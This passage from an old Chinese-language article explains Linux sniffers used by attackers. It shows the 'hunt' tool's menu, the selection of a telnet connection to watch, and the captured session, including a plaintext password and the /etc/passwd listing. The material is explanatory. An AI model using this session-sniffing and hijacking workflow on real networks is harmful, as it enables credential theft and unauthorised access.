解析linux环境中黑客常用嗅探器.doc

窗体底端解析Linux环境中黑客常用嗅探器2004-09-1515:33作者:出处:Linuxaid责任编辑:原野最后检查了/etc/passwd,在整个过程中都运行有hunt进行嗅探: ---MainMenu---rcvpkt0,free/alloc63/64------ l/w/r)list/watch/resetconnections u)hostuptests a)arp/simplehijack(avoidsackstormifarpused) s)simplehijack d)daemonsrst/arp/sniff/mac o)options x)exit *>w 0)[1049]-->[23] chooseconn>0 dump[s]rc/[d]st/[b]oth[b]>b 注:上面的输入(黑色字体部分)指示hunt来记录0号连接,并输出源和目的信息。则hunt将显示hapless的所有活动信息到终端屏幕上: 22:18:43up21min,4users,loadaverage:,, TRL-Ctobreak hhaapplleessss Password:unaware [******@linux2hapless]$cclleeaarr [******@linux2hapless]$wwhhoo roottty1May2021:57 ww 22:18:43up21min,4users,loadaverage:,, [******@linux2hapless]$mmoorree////ppaasssswwdd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTPUser:/home/ftp: man:x:15:15:ManualsOwner:/: majordom:x:16:16:Majordomo:/:/bin/false postgres:x:17:17:PostgresUser:/home/postgres:/bin/bash nobody:x:65534:65534:Nobody:/:/bin/false anon:x:100:100:Anonymous:/ho